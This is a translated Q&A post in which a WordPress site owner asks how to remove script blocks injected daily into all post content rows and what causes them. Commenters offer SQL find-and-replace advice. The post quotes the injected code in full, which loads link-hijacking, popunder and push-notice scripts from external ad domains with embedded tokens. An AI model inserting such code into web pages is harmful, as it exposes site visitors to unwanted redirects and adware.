【发布时间】:2025-12-13 03:05:03
【问题描述】:
每天左右,后门代码都会被添加(注入?)到 wp_posts - post_content 中所有行的末尾。
Wordfence 只拾取条目 cutwin 并提醒我 - 它不会清理它。我还尝试了其他 WP 反恶意软件插件,但均无效。我目前所知道的只是通过在'cutwin'上使用WP搜索和替换来中性化它,替换为'example',然后煞费苦心地逐行删除代码。表中有 113 个条目,这很慢。我的问题是:
1) 谁能给我 SQL 代码,我可以将其放入 phpmyadmin 中以快速从 wp_posts - post_content 中的所有行中删除它?找到第一行的脚本(见下文)并删除它以及之后的所有内容都可以解决问题,但我自己不知道如何编写代码。
2) 有谁知道是什么原因造成的以及如何摆脱它?
主题:Generatepress
使用的插件: Akismet 反垃圾邮件, 反恶意软件安全和蛮力防火墙, 更好的搜索替换, 元素, 元素专业版, 全科医生保费, 超级菜单, UpdraftPlus - 备份/恢复, 使用任何字体, Wordfence 安全, WP控制, WP火箭, WP 糊涂, WP-Sweep
恶意代码如下。
非常感谢, 迈克尔
<script type="text/javascript">
var adlinkfly_url = 'https://cutwin.com/';
var adlinkfly_api_token = 'f6624368d190e8c1819f49dc4d5fcb633a4d9641';
var adlinkfly_advert = 2;
var adlinkfly_exclude_domains = ['example.com', 'yoursite.com'];
</script>
<script src='//cutwin.com/js/full-page-script.js'></script>
<script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script><script type="text/javascript">//<![CDATA[
(function() {
var configuration = {
"token": "11f0dc1ed8453e409e04d86bea962f34",
"exitScript": {
"enabled": true
},
"popUnder": {
"enabled": true
}
};
var script = document.createElement('script');
script.async = true;
script.src = '//cdn.shorte.st/link-converter.min.js';
script.onload = script.onreadystatechange = function () {var rs = this.readyState; if (rs && rs != 'complete' && rs != 'loaded') return; shortestMonetization(configuration);};
var entry = document.getElementsByTagName('script')[0];
entry.parentNode.insertBefore(script, entry);
})();
//]]></script><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script>
【问题讨论】:
-
代码是否相同?查看mysql str_replace。你会发现一个“查找和替换”查询。此外,列出您已安装的插件可能会有所帮助。很有可能你的问题就在那里。
-
谢谢凯。每次都是一样的。标准查找和替换的问题在于代码跨越多行并且本身包含引号,因此失败。稍后我会添加上面的插件。
-
您应该能够转义引号。您可以克隆该表并在其上运行实验。
-
我会调查并尝试!
-
嗨,我目前正在与完全相同的问题作斗争。有趣的是,除了 Wordfence 之外,您的网站和我的网站之间绝对没有相似之处......让我想知道 Wordfence 是否就是它现在被破解的全部内容。如果您找到罪魁祸首和/或解决方案,请发布!
标签: mysql wordpress phpmyadmin code-injection